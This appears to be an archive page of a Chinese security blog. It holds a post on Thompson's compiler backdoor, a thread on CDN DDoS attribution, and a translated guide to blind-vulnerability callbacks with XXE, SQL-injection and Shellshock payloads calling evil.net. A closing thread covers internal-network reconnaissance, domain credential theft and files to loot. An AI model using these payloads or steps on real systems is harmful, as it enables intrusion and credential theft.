某些搜索引擎超科幻搜索结果,泄露了不只一点点 尺子和锤子的力平衡 - 创意的平衡尺 简单分析一个通过 js 劫持进行黑帽 SEO 做淘宝客的案例 街机、捕鱼机、上分器、解码器、打码器、写码器、无线、遥控 美国试点超级无线网络 覆盖范围达数公里 电话机真的可以用嘴巴模拟拨号音来拨号? 用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话 用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话 如何从按键音中听出360总裁周鸿祎的手机号码 + 详细剖析 iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器 Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗 iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号 男子淘宝购物10秒后接“卖家”电话 被骗7000元 找出 GFW 在 Internet 的位置、追踪 GFW 在互联网中的位置 视频:Sight 未来视网膜成像技术 科幻微电影 黑客攻击导致澳安全情报局网站,崩溃长达半小时 德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机 非法获取百度推广账号 实施网络诈骗 篡改百度推广 市民被骗财 黑客在Defcon建立私人电话网络 - DEFCON 忍者 GSM 网络 Facebook 花40万美元,找黑客来检查安全漏洞 支付宝错发中奖短信 送236台iPad2 视频:纸飞机驱动模组,电子纸飞机 网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 大陆互联网安全服务提供商参与“台湾骇客年会” 讲述一个关于高考的“黑客”故事:用2B铅笔“注入”阅卷系统 视频:如何动手改造iPhone添加无线充电功能 善用网站权限设置 莫让社交变“裸奔” 社交网络诱人沉迷 病态的自恋 6000万网民一年被骗300多亿元 黑客6人组有人分析有人谈判 监控ATM机视频锁定嫌疑人 奇虎360成功加入GFW防火长城 为国家安全保驾护航 瑞典研发新技术可让WiFi每秒传输2.5TB数据 拉斯维加斯国际黑客大会(DefCon 2012黑客会议)本周开战 著名编剧宁财神被遭遇钓鱼淘宝 被骗近万元 虚假客服电话充斥互联网行骗 专家:竞价排名是祸首 公布 GFW 防火墙旗下部分子服务器 IP 电信诈骗韩国人案抓235人 涉案金额1亿多 男子侵入上海移动平台群发广告短信牟利获刑 802.11b 无线网络固件级攻击、802.11b Firmware-Level Attacks 2012中国计算机网络安全年会将于 7月3日-7月5日 在西安举行 福布斯:IE10“禁止追踪”扼杀网络广告市场 如何加载 VMware Workstation v8.0.1 加密过的虚拟磁盘文件(vmdk) 网购158元的货物之后被网站“钓”走2万 谷歌放出首个由Google眼镜拍摄的视频 720P格式 视频:1秒钟可复制银行卡?这不是骗局[财经夜行线] 我国警方成功摧毁特大跨国跨两岸电信诈骗犯罪集团 美国秘密研制新概念网路武器 可攻击离线电脑 无线电信号渗透 Msnshell的那个有问题的官方下载链接追踪 手机全息投影、初音、Miku、立体投影,制作方法已放出,图文+视频 刷下“拉卡拉”卡里2万多块钱丢了,复制银行卡,POS机、刷卡黑客 从技术角度深入剖析:改号软件,电话号码任意显示,伪造来电显示 病毒集团盯上网络购物 在淘宝上被诈骗5.46万元 浙江绍兴一犯罪团伙用网银漏洞诈骗三百余万获刑 看FBI是怎么网络钓鱼执法的 苹果欲建造内部食堂 防止保密信息泄露 华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕 视频:国外黑客无线入侵、遥控电子路桥系统 视频:国外黑客无线入侵保时捷911,并且远程操控、遥控 视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播 视频:国外黑客入侵高速公路交通电子屏 大屏系统被黑 泰国国会现场直播不雅照 视频:漂浮在空中的水珠、静止的水滴,适合做成展品的视错觉,超炫!! 美军投资新型隐形眼镜 可将信息投射到眼球上 碰到一个冒充QQ好友进行诈骗的骗子…… 利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备 QQ邮箱漏洞被骗子利用 小企鹅一闪1000块被骗走 电信诈骗,电话营销,一响挂电话,推销平安、人寿保险,冒充朋友 广东台湾两地警方联手破获电信诈骗大案 电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍? Google开发扩展现实眼镜 基于Android系统运行 一批传播谣言的互联网站被依法查处 任何一种装机量巨大的软件,都有政府监控模块,我们应该如何保护自己? 我国将建立IP地址黑名单制度 打击网络垃圾邮件 小米官网“闹鬼” 消费者买手机三千元被骗 美国色情网站遭黑客袭击 7.3万用户资料泄露 Pwn2Own 黑客挑战赛:火狐浏览器已经落马 黑客攻击漏洞 让 ATM 机自动吐钱 Mydecms 贤诚文章管理系统泄露数据库账号、密码、库名漏洞 惊爆“17岁少女黑客 fly”高清无码裸照!!这下你真的火了!!! 谷歌举办 Chrome 找漏洞大赛 悬赏100万美元 伪造免费 WiFi 盗你账号密码 瑞星:ATM出现漏洞 银行:哪有这回事? 瑞星提醒:农行、建行ATM出现漏洞 可被黑客利用攻击内网 末世入侵行动 (Fire Sale!) 末日入侵行动 黑客曝联通“10010短信”漏洞 被指易遭诈骗利用 网络钓鱼危急行业发展 专家呼吁各方合力围剿 用 js 实现本地 md4、md5、sha1 加密表单并提交 视频:德国牛人!手工打造电力驱动的载人多浆式直升飞机! 视频:看牛人是怎么玩遥控飞机的 - 变矩螺旋桨倒飞 视频:鬼佬的室内四轴定位系统,震惊,飞机模型能玩到如此地步! 浙大实验室现最萌饮水机 揭开“饮水机娘”的神秘面纱 视频:360度全景球形可投掷照相机 360度全景球形相机 黑客入侵南非银行系统 盗走670万美金 黑客入侵、盗取 互联网信息办公布用户信息泄露事件查处情况 2012年新浪微博用户密码泄露漏洞(图片解析) 黑客考虑发射通讯卫星对抗全球互联网监管 目前我认为是2011密码泄露事件最合理、最符合实际的一个解释 ATM Skimmers - ATM Hacker - 自动提款机黑客 Tabnapping 浏览器标签劫持 用假冒浏览器标签进行钓鱼攻击 GSM蜂窝基站定位基本原理浅析 用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位 不要偷黑客的东西 - Why you don't steal from a hacker 纪念集成电路之父、英特尔创始人罗伯特·诺伊斯84周年诞辰 惊爆!电影白蛇传说官网被挂“QQ中奖诈骗广告”! 视频: 你知锁患有多深 几秒钟可撬锁 “锡纸晃匙” 日本众议院被“黑”,英国将开网络安全国际大会 【视频】发射到121000英尺(36880.8米)摄影机拍摄地球 索尼又遭黑客攻击 或致9万余份用户信息泄露 物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点 解密电信诈骗:改号平台盗用110 日拨上万电话 67名跨国电信诈骗嫌犯从菲律宾押解回到福州 工程师网盗支付宝11万 开设79个账户转移盗款 【分析】腾讯独立域名QQ空间被钓鱼,腾讯官网被黑,被植入钓鱼页面! 男子信用卡绑定电话遭修改被盗刷7万元 金山截获国内首个QQ群蠕虫病毒 北京警方破获新型网络合同诈骗案 1970年左右发现最早黑客技术——哨子 黑客盯上外贸公司业务员邮箱 入侵员工电脑 跨国诈骗案 基础设施安全:黑帽大会曝工业系统漏洞 国内各类 WebShell 密码大全 爆破、社工用 webshell-password VB Html编码、Html解码、Html加密、Html解密、Html转义字符 美国号称世界最快飞机试飞时失去联系 美国安全局大力招募黑客 瞄上年度“黑客”大会 北京东城警方强装WIFI监控软件遭质疑 【转载】高级社工:从QQ空间可以暴露的信息 美国军方遭黑客袭击 泄露大量秘密信息 黑客的新目标:泄密其他黑客资料 国家计算机病毒中心发现新型蠕虫 即时聊天要当心 【视频】NRF24L01无线射频模块实现无线视频通讯实例 【视频】NRF24L01无线射频模块 实现无线视频通讯实例 国外某黑客大会视频 大家想知道, 国外黑客大会是咋样的么? 艺电称旗下一网站遭攻击 用户资料泄露 美“赤脚大盗”科尔顿面临6年监禁 曾偷5架飞机 美国“末日飞机”曝光 面临大灾难可保护首脑 可抗核武器袭击、核辐射 CMCC【中国移动】无线热点破解思路 破解无线wifi密码后不能上网的问题解析 台两15岁少年开淫窟 骗12名少女为“爱”卖身 月进300万元 【公告】警惕名为:Nuclear'Atk. QQ:424244818 冒充本人的骗子黑客 索尼承认1000万信用卡资料遭盗窃 索尼PSN数据被黑激怒全球客户 苹果iPhone和谷歌Android手机被曝"定位"用户 入侵者必读, 网警、公安是如何找到你的! 【视频】宝坻 - 历史上最胆大的银行劫匪 某人肉搜索的典型案例分析 一群推理神牛 囧事 知名反病毒厂商卡巴斯基源代码泄露 能直接在眼球上投影图像的隐形眼镜,智子? 呵呵,腾讯?QQ?网民隐私?公安监控? 360秘密收集用户信息日志文件大规模外泄 无银行卡,密码10万元1分钟转走,超级黑客? 【文章】10.3 通信信道加密 链对链 端对端 【文章】Winrar 压缩软件的加密算法 - AES 【文章】9.6 密码反馈模式 初始化向量 错误 【文章】9.3 密码分组链接模式 - 反馈寄存器 【文章】9.1 电子密码本模式 - 多重加密处理 【文章】8.10 密钥有效期 密钥破译 密文分析 【文章】8.9 泄露密钥 对称密码 私/密钥泄露 【文章】4.14 密钥托管 密钥托管的政治 安全 【文章】4.13 秘密的全或无泄露 ANDOS协议 【文章】应用密码学: 加密数字签名 重发攻击 【文章】应用密码学 - 隐写术代替和换位密码 【文章】应用密码学:前言 - 作者简介 - 目录 3389 远程桌面 Mstsc RDP协议详细解析 (下) 360,腾讯等公司之间的战争,以及网民用户隐私 【公告】公布一个特大诈骗案件的网络“黑客” 扫描指定IP网段存在的网络摄像头、监控设备 【VB技巧】VB URL编码与解码 URL加密与解密 【VB技巧】VB Base64编码/解码/加密/解密 【Asp】ASP Unescape加密/解密/编码/解码 【漏洞】Microsoft IE CSS处理跨域信息泄露 【计算机常识】双机无线wifi互联教程 【视频】永远不会掉下来的纸飞机 - 折纸滑翔机 【工具】2010黑帽大会上的提权好东西 提权大杀器 【技巧】用无线路由实现无线桥接 【工具】无线破解/渗透工具 Beini-1.2.1 【工具】AIO_Wifi_Hack_2010 渗透某餐厅无线点餐服务器 全套手机秘籍/手机指令 DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击 视频:黑客实战入侵,黑客入侵大楼灯光控制系统,黑客们的游戏,户外物理入侵

2015/10/26
articleCard.readMore

比 XcodeGhost 更邪恶的手段 30 年前就出现了(反思对信任的信任)

比 XcodeGhost 更邪恶的手段 30 年前就出现了 最近在开发者圈里讨论最多的莫过于 XcodeGhost。其实在 20 年前,更高明的手段就出现了。 1984 年的时候,UNIX 创造者之一 Ken Thompson 获得了 ACM 图灵奖。他的获奖演讲叫做 Reflections on Trusting Trust(反思对信任的信任)。 1984 年图灵奖得主 Ken Thompson 在这个稿子只有三页纸的演讲中他分三步描述了如何构造一个非常难以被发现的编译器后门。这后来被称为 the Ken Thompson Hack(KTH),有人说它是 the root password of all evil。 在第一步里,Thompson 展示了一个可以输出自己的源代码的 C 程序。这需要一定技巧,但很多人作为编程练习都做过。 在第二步里,Thompson 在 C 的编译器里增加了一段代码(后门),让它在检测到自己在编译 UNIX 的 login 命令时在输出里插入一个后门。这个后门会允许作者用特定密码以 root 身份登录系统。 在第三步里,Thompson 在第二步的编译器里使用第一步的方法加入另一段代码(后门生成器),使得这个编译器在检测到它在编译自己时自动把第二步的后门和第三步的后门生成器插入到输出里。 在得到一个第三步的编译器后,就可以把第二、三步新增的代码从源代码里删除,因为这个新的编译器在编译它自己原来「干净」的源代码时会自动把后门和后门生成器加上。很多语言的编译器都会使用「自举」的方式编译,也就是会用一个编译器的旧版本可执行文件来编译新版本的源码,所以这样一个高危的后门完全可以在一个开源项目里存在。通过阅读这个编译器的源码是无法发现这个后门的。 KTH 还可以被加强,让它更难被察觉。比如这个编译器可以污染它编译的调试器、反编译器等开发过程中使用的工具,使得即使程序员反编译这个编译器后看到的仍是干净的代码,除非他使用的是 KTH 注入前的版本。所以当这个带有 KTH 注入的编译器来自于官方渠道时,它的后门是几乎不会被发现的,而且会影响所有用户。 最近的 XcodeGhost 最多只能算是 the Ken Thompson Hack 的一个简化版本,没有试图隐藏自己,并且修改的不是编译器本身,而是 Xcode 附带的框架库。 Thompson 在演讲里的结论是:即使开源项目也无法保证安全。在不考虑硬件或 microcode 后门的情况下,只有当运行的每一个程序都完全是自己写的时才能确保安全。可是谁的电脑上能只运行自己写的程序呢?恐怕只有 Ken Thompson 和 Dennis Ritchie 能在用自己发明的语言写的操作系统上用自己写的编译器编译自己写的操作系统吧。 Ken Thompson 从贝尔实验室退休几年之后加入了 Google。在 Google,他和原来贝尔的老同事一起发明了 Go 语言。Go 从 1.5 版开始以自举的方式编译。;-) 原文地址:via Hong Jiang@medium

2015/10/26
articleCard.readMore

讨论:一些CDN厂商(比如加速乐,360等)是怎么计算域名流量的(非HTTP)?

一些计算流量的CDN厂商(比如加速乐)是怎么计算域名流量的 huoji (有时候,想象力是突破技术瓶颈的关键!) | 2015-10-12 23:59 不是http的流量 是计算纯流量的 比如骇客A 使用UDP碎片攻击了加速乐保护的网站,结果流量太大回源 那么加速乐是怎么知道这个域名流量很大呢? [原文地址] 各种吐槽: 1# 小熊饼干 | | 2015-10-13 23:17 一般人我都不告诉他。 最基本的原理是二分法,当你ip足够多时,检测出那个域名正在被攻击不是很难。 CDN 厂商一般有很多个节点,分布在全球/全国各地,如果是攻击源很分散(如肉鸡),则由于智能调度的存在,这些攻击流量会被分散到各个节点,导致攻击效果会差很多,所以这种不在这里讨论。这种其实cdn最喜欢了,像cloudflare也是使用anycast等将攻击流量分散到全球节点,这样防御能力就相当于将各个节点的带宽加起来。 另外,有个基础,检测某个目的IP(CDN的ip)的流量大小是很简单的。 先以国内的为例,国内的CDN就比较苦逼,anycast实施起来很贵,只能使用unicast,这样,智能调度只能在dns解析上做文章了。比如电信的用户调度到电信的节点,河南的调度到河南的节点。 先来分析一个简单的攻击例子,比如你有一个20G的攻击带宽,syn/udp flood 某个域名时,可能你的攻击目标会集中到少数几个(如2个,记为ip1,ip2)。 这样,我们来看下,如果我是cdn我会怎么做: 0. 上面说了,CDN检测到了自己的这两个ip流量异常是很easy的。 1. 这两个ip上的域名是‘嫌疑人’,但是可能多达N个。 2. 那我们就将这N个二分,分到2个新的ip上,ip3, ip4,这样ip3, ip4 各有N/2个域名。 3. 如果攻击不会跟随dns解析,即攻击还傻傻打ip1,ip2,那我大不了放弃这两个ip,或者将其引入黑洞。(此时找不出谁被打) 4. 如果攻击跟随dns解析,那么好玩的来了,或者打ip3, 或者打ip4(注意,我们先只考虑同一时间只有一个域名) 5. 假设打ip3, 我们就继续二分,将N/2 个域名解析到ip5,ip6,这也ip5,ip6上只有N/4个域名。 6. 以此下去,就可以找到是哪个倒霉鬼被打。 7. 当逻辑梳理清楚,其实这些都是可以自动化的。 cloudflare 使用了anycast,如果定位到某个ip被攻击,很方便的可以将此ip的流量分散到全球节点,或者放到黑洞类的设备。 上面只是简单的原理说明,大家可以自己想下更复杂的场景: 1. 多个域名同时被打怎么办。 2. 攻击不跟随,把ip1,ip2 所在机房打卦怎么办。 3. cdn 应该怎么把客户分配到不同的ip上去 4. 国内没有anycast,即每个节点都是独立作战,这时候该怎么办。 2# Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2015-10-13 01:00 这是一个难题,cloudflare、阿里云还有另外一些CDN商已经有方案出来了,但是都没公开过,或许谷歌专利上面能找到? 3# huoji (有时候,想象力是突破技术瓶颈的关键!) | 2015-10-13 18:38 @Mujj 那有什么可能的方法呢 4# 小哲哥 | 2015-10-14 07:34 楼上说的涨姿势了,虽然我不懂 5# 我是小号6 (1:8.5长期收购wb,QQ1136036036) | 2015-10-14 08:19 楼上的楼上说的涨姿势了,虽然我不懂 6# huoji (有时候,想象力是突破技术瓶颈的关键!) | 2015-10-14 10:41 @小熊饼干 我是说这么计算被攻击的流量 7# huoji (有时候,想象力是突破技术瓶颈的关键!) | 2015-10-14 10:42 @小熊饼干 怎么计算CDN节点上一个域名的流量呢 8# 小熊饼干 | 2015-10-14 10:57 找到了哪个域名被攻击,然后将其防到单个IP上,然后看下这个ip的流量多大,是不是就计算出来了? BTW: 你在加速乐面板上看到的流量大小 根本不是syn/udp 流量的的大小。 如果是CC攻击,计算流量大小很简单是吧? 9# %230CC (Who's Your Daddy ---lordi) | 2015-10-14 11:25 其次应该是CDN有标识吧。 你从哪来要到哪去 都会有标识和记录 所有你流量打站的时候 可能我不知道你从哪里来 但是我知道你是要到哪里去 …… 哎呦我去 10# GaRY | 2015-10-14 12:44 基本是 @小熊饼干 所说的那些方法。这是针对目前那种非应用层攻击的协议层攻击类型最普遍的查找方式。 这里补充一下,在很多云CDN厂商,很多情况下他也同时是被攻击网站的DNS服务者。在被攻击的时候,利用同时针对DNS的分析也能找到一些蛛丝马迹。如果不通过DNS解析的,说明并不是针对某一站点,通常就当作是针对节点进行攻击进行防御就OK了,这些攻击不会计入到单个站点的流量中。 至于协议层攻击,对于国外厂商,anycast的作用下,让他们其实不care究竟是哪个域名带来的。如何防御才是第一位的。在这个时候,屏蔽攻击来源更容易实现。 而对于国内厂商,没有anycast让他们没法发挥最大防御能力,因此才会经常用到二分法之类的方式,定位攻击站点,在实在无法防御的大型攻击情况下,才会剔除他来保其他。 顺带说下,绝大多数云CDN厂商在控制面板里显示的攻击流量,都单纯的是应用层攻击流量(CC+web攻击)。 11# 小熊饼干 | 2015-10-14 13:00 @GaRY 多谢大牛补充。 12# huoji (有时候,想象力是突破技术瓶颈的关键!) | 2015-10-14 13:14 @小熊饼干 还有一个问题,某些免费cdn,比如360网站卫士。 当有udp攻击的时候,我服务器上的金盾 会发现是360的节点发动了udp攻击,,看情况很像是360把“流量”转发到了我服务器上。。。这又是咋回事。 13# 小熊饼干 | 2015-10-14 13:41 @huoji UDP “转发”这个问题就要具体分析了。 按说360也算一个‘正规’厂商,应该不会转发UDP的。怀疑是他们DNS服务器被利用放大攻击了? 只是猜测,需要你抓包分析下。 14# Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2015-10-14 13:56 国内这些厂商里面数电信的云堤有优势,来自电信的攻击基本上算全过滤了,近源压制、近源清洗,基本上来自电信的攻击源流量还没出省攻击源和流量就被处理了,X里云的X盾里面有他的影子。 15# huoji (有时候,想象力是突破技术瓶颈的关键!) | 2015-10-14 18:43 @Mujj 晚点拿几个肉鸡试一下给你看看吧,我当时就很奇怪。 16# huoji (有时候,想象力是突破技术瓶颈的关键!) | 2015-10-14 20:16 @Mujj 你可以无视我的回复。 17# huoji (有时候,想象力是突破技术瓶颈的关键!) | 2015-10-14 20:16 @小熊饼干 晚点我要试一下。。 18# 无敌L.t.H (‮……天百一爱恋考高:簿相色白产国) | 2015-10-18 23:06 分配的CNAME解析次数多、分布广也会被发现。 19# 无敌L.t.H (‮……天百一爱恋考高:簿相色白产国) | 2015-10-18 23:12 大多数CDN是禁止非HTTP流量通过的,一般UDP流量在上级网络中就被过滤掉了,所以很多“高防”服务器是禁止UDP流量通过的。 20# Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2015-10-19 02:22 @无敌L.t.H 哪来的撸哪 相关内容: 简单获取CDN背后网站的真实IP,CDN逆向,反向跟踪网站真实IP cdn缓存的一些安全风险,cdn加速网络节点缓存可能导致的严重安全问题 对“国内大多缓存DNS已可能被秘密劫持”漏洞 的再次猜想 通过nginx配置文件抵御攻击,防御CC攻击的经典思路! CDN流量放大攻击思路 站争(代号1937)第三节:决策!(上) Zmap详细用户手册和DDOS的可行性 打造TB级流量DDoS大杀器,超级流量反射放大攻击系统 如何看两个ip是不是在一个机房,路由追踪 【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗? 云计算做数据包分析防御DDOS攻击 超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她 黑客可利用云开发平台进行DDOS攻击 基于云计算的DDOS攻击缓解方案 迅雷云你伤不起啊,利用迅雷云资源绑架用户,发起大型DDOS攻击 史上最大流量DDOS攻击者被捕 分析:DDos攻击被更有针对性地应用 IP反查网站接口 旁站查询 IP查域名 域名历史解析记录查询 IP地址查机房AS号 一段黄色笑话引发的DDoS攻击 US-CERT:DNS服务器配置不当是上周300G DDoS的元凶 由多个独立站长共享服务器资源组建巨型类CDN云网络的可行性 基地组织官网遭受海量ddos攻击 基于日志整理出的经常扫描的 IDC、ISP、IP段、AS号及web服务器内容 DDoS 攻击转移到 IPv6 Asp + 后台服务控制的 DDOS 木马,整套源码下载 WordPress 怎么防止刷流量?一个讨论防御CC攻击的话题…… 绕过CDN的思路,绕过CDN查找真实IP的思路,一个新颖并另类的方法 绕过CDN查找真实IP的思路,一个新颖并另类的方法 IIS 6.0 IP 地址限制辅助工具 v1.0 IIS 批量封禁 IP 地址、网站被 CC 攻击的解决办法 简单分析一次 CC 攻击 浅谈Ddos攻击攻击与防御 长安刺客 - 旁注杀手 v1.3 + Crazy Scan v1.0 - 疯狂扫描 v1.0,发布! Asp 防御CC攻击模块 (Anti-CC.asp) Asp 防御CC攻击模块 (Anti-CC.asp) - 增加小功能 【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息 查找“CDN、负载均衡、反向代理”等大型网络真实IP地址的方法 电磁风暴超暴力 PHP DDOS 攻击工具 & PHP DDOS 攻击 - 编年史 长安刺客 - 旁注杀手 v1.2 版 + CDN 终结者 v1.1 发布 长安刺客 - 旁注杀手 v1.1 版发布,外加强力新功能:CDN 终结者 v1.0 美国热炒解放军网络战能力 国产神器!军工级暴力DDOS攻击系统! 长安刺客 - 旁注杀手 v1.0 Beta4 长安刺客 - 旁注杀手 v1.0 Beta3 长安刺客 - 旁注杀手 v1.0 Beta1 长安刺客 - 旁注杀手 v1.0 Beta 测试版 - 发布 男子转嫁黑客攻击致金盾网瘫痪 被DDOS请勿乱指域名到政府网 疯子的研究: 瘫痪整个互联网绝非天方夜谭 利用P2P网络发动大规模、大流量DDOS攻击 Linux 系统下 DDOS 工具 tfn2k 攻击原理详解 【批处理】批处理、Bat 也能进行 DDOS 攻击? 【Asp代码】用Asp来搞DDOS攻击 【Asp技巧】用Asp来DDOS DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击 留言评论(旧系统): 佚名 @ 2015-11-02 09:17:11 “huoji (有时候,想象力是突破技术瓶颈的关键!) | 2015-10-14 13:14 @小熊饼干 还有一个问题,某些免费cdn,比如360网站卫士。 当有udp攻击的时候,我服务器上的金盾 会发现是360的节点发动了udp攻击,,看情况很像是360把“流量”转发到了我服务器上。。。这又是咋回事。" 我相信这个人绝对是“白”帽子 : ) 本站回复: -_-!!!

2015/10/26
articleCard.readMore

黑盒测试中那些"看不见的"漏洞

黑盒测试中那些"看不见的"漏洞 小饼仔 | 2015-09-16 17:01 原文:Hunting Asynchronous Vulnerabilities 简单翻译下大致意思 在黑盒测试中,一般我们通过请求的响应来判断一个漏洞是否存在,比如 - 是否触发错误消息 - 响应内容是否不同 - 是否有时间延迟 但有一些漏洞触发后并不会造成响应不同,或者不会立刻执行,比如二次SQL注入、命令注入但只会在夜间crontab执行等,导致我们无法通过一般的手段来判断是否存在漏洞。 这类“看不见的”漏洞大致可以分为三类: - 发生在后台线程的Server端漏洞。比如在队列中的SQL注入查询,你不知道这个注入查询什么时候会被执行,也许payload会触发时间延迟,但是这个延迟仅影响后台线程,无法在前台被检测到。 - Blind漏洞,需要二次事件来触发。比如Blind XSS、二次SQL注入 - 不会造成响应不同的漏洞,并且这类漏洞不支持任何方法来触发时间延迟。如Blind XEE 和 XPath注入 为了能够检测到此类漏洞,我们需要一个能够促发callback的payload,callback能够从有漏洞的应用向攻击者控制的机器上发起连接,比如Shellshock的例子 () { :;}; echo 1 > /dev/udp/evil.com/53 DNS: More than just names介绍了如何利用DNS来攻击,有兴趣可以看一看 下面介绍一些不同漏洞类型下的DNS callback XML漏洞 下面代码利用6种不同的XML漏洞来尝试触发callback(包含evil.net的url) <?xml version="1.0" encoding="utf-8"?> <?xml-stylesheet type="text/xml" href="http://xsl.evil.net/a.xsl"?> <!DOCTYPE root PUBLIC "-//A/B/EN" http://dtd.evil.net/a.dtd [ <!ENTITY % remote SYSTEM "http://xxe2.evil.net/a"> <!ENTITY xxe SYSTEM "http://xxe1.evil.net/a"> %remote; ]> <root> <foo>&xxe;</foo> <x xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://xi.evil.net/" ></x> <y xmlns=http://a.b/ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://schemalocation.evil.net/a.xsd">a</y> </root> SQL注入 Postgresql 利用copy 命令,可以调用任意的shell命令(需要一定权限) copy (select '') to program 'nslookup evil.net' MySQL 和 SQLite3 Windows下,大多数文件系统函数都支持UNC path,UNC path能够引用远程server的资源,因此能触发DNS查询。也就是说Windows下几乎所有的I/O函数都能够触发callback SQLite3 ;attach database '//evil.net/z' as 'z'-- - (SELECT load_extension('//foo')) MySQL LOAD_FILE('\\\\evil.net\\foo') SELECT … INTO OUTFILE '\\\\evil.net\foo' MSSQL SELECT * FROM openrowset('SQLNCLI', 'evil.net';'a', 'select 1 from dual') EXEC master.dbo.xp_fileexist '\\\\evil.net\\foo' BULK INSERT mytable FROM '\\\\evil.net$file' EXEC master.dbo.xp_dirtree '\\\\evil.net\\foo' Oracle SQL Oracle提供很多方法来触发callback,如UTL_HTTP, UTL_TCP, UTL_SMTP, UTL_INADDR, UTL_FILE…,但是都需要各种权限。 但是可以利用内置的XML解析函数,低权限用户也可以调用。最近Oracle也被发现存在XXE注入漏洞,因此我们可以利用XXE来触发callback SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://evil.net/"> %remote;]>'),'/l') Write-based callbacks 因为非WINDOWS系统不支持UNC paths,我们可以利用写文件函数来触发callback 最直接的方式就是写一个web shell,前提是需要知道webroot路径 修改mailspools / maildrops,控制邮件发送,这个需要root权限,没什么用 利用mysql函数来修改配置文件,将修改 bind-address成我们的hostname,然后在dns响应返回0.0.0.0,让mysql绑定所以可用接口 shell命令注入和 XSS部分大家参考下原文 [原文地址]

2015/9/27
articleCard.readMore

讨论:边界之后下一步你会做什么?内网渗透、局域网入侵

五道口杀气 | 2015-09-16 16:36 在对一个目标进行渗透测试时,找到了一台服务器的漏洞获取相关权限进入内网,在发现该服务器上并没有什么敏感数据,必须要对其内网进行下一步的渗透,你会怎么收集信息呢? 1 扫描内网段内的80端口看title。 2 扫描内网段内的各种服务(ssh、ftp、snmp、mysql、telnet等)弱口令 3 ??? 各位在进行内网测试的时候是如何进行第一步收集信息的呢,如果网段特别大的话,从哪里收集开始呢? [原文地址] 各种吐槽: 1# mickey | 2015-09-16 16:41 看日志(web/安全日志),看内网谁和这台机器联系。如果有web,根据日志,先探针,然后定向挂马。安全日志链接过来的,原来有一个3389登录过来,然后如果管理员挂载了系统磁盘(通常c),写启动项。下次上线。 一般都先做这些,然后才扫描。 2# livers (如梦似幻) | 2015-09-16 17:37 按任务打卡, 网段大的话 一般在AD域里面,基本上域一套命令 来收集 net group “domain admins” /domain dsquery server/computer/user/contact/group/ou/site 等。 基本上获取到大部分域的信息 接下来搞域控制器 可以爆破 可以嗅探抓NT-hash (或者猥琐一点 社工下域控管理员来链接下机器) NT-hash拿到可以爆破 生成一般TGT 也可以使用CVE-2014-6324 生成Golden Ticket 这时可以横着爬了 3# 三好学生 (:) | 2015-09-16 17:52 @livers 也可以试试kerberoast:) https://github.com/nidem/kerberoast 4# xsser (十根阳具有长短!!) | 2015-09-16 18:06 提交乌云 5# 随风的风 (静,已修身) | 2015-09-16 18:14 提交乌云 6# 牛 小 帅 (心若没有栖息的地方走到哪里都是在流浪!) | 2015-09-16 18:39 @xsser 管理员乱删我帖子 我就发个解密贴就删了 我进不来社区 可恶 7# phith0n (我也不会难过 你不要小看我) | 2015-09-16 22:33 我用我为数不多的经验想一哈…… 我觉得,一个机子如果是“真的”在内网里的话,很难一点东西也挖掘不出来。 为什么“真的”打引号,因为有些机子也是内网地址,比如阿里云,但实际上这台机子是独立的,和内网内的其他机器没有任何关系。 如果是在企业内网的话,往往还是能挖出一些信息的,先确定这台机子是做啥的:web、数据库、文件、备份、测试。。。 然后就根据具体用途挖掘具体信息: 比如看各种文件: /etc/hosts (查找内网地址最常见的地方) nginx/apache/php/fastcgi(配置文件,配置文件里有包含的,一样一个一个看) redis/mysql/mongod/memcached (不光看配置文件,还要连进去看内容,挖掘敏感信息,如密码、邮箱等) rsyncd (如果内网有部署rsync,看看1.是否无密码 2.限制的IP如何 3.什么权限 4.是否允许chdir) /tmp/ (各种宝藏聚集地,比如可以挖掘一下session里有保存啥) /etc/init.d/ /etc/systemd/ /etc/passwd /etc/crontab 有root权限,就看看~/.bash_histoty、~/crontab、~/.bashrc、~/.ssh/known_hosts、~/.dbshell(这个是mongodb的记录)、~/.mysql_history。。。太多了,不一一列举。 各种源(yum、apt-get、pip、composer、gem、npm)配置文件(可能是内网的源) */.git/config (多看看有.git的目录,svn同理,有时候找得到内网的gitlab) php扩展目录(有时候能找到一些有趣的扩展,不多说) vpn、shadowsocks等客户端配置文件:国内企业服务器要翻墙也比较常见 zabbix配置文件 /etc/mail.rc 更新源、git、svn,这类机器如果拿下来,影响大量内网机器。在内网内其他机器更新软件、拉代码的时候你就不经意间搞下他的机器了。 fastcgi(对应9000端口):一般会放源码,拿下来了以后后续挖漏洞,后续的渗透方便的多 rsyncd(对应端口873):做备份或负债均衡,拿下来一样能搞到很多源码(通过高权限rsyncd可以直接提权) mysql/mongod/mssql/oracle...:数据库服务器,意义不言而喻,拿得到很多密码,渗透就方便多了(关键是怎么拿?只能看运气了,通用密码、内网的未授权访问等) redis/memcached:可能放一些session,也能对web渗透有一定帮助 